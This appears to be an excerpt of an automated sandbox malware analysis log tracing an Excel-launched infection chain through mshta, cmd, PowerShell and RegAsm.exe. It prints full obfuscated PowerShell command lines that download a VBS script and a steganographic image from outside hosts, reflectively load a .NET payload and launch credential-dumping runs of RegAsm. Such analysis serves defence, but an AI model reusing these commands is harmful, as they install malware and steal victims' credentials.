                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_28-33280
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
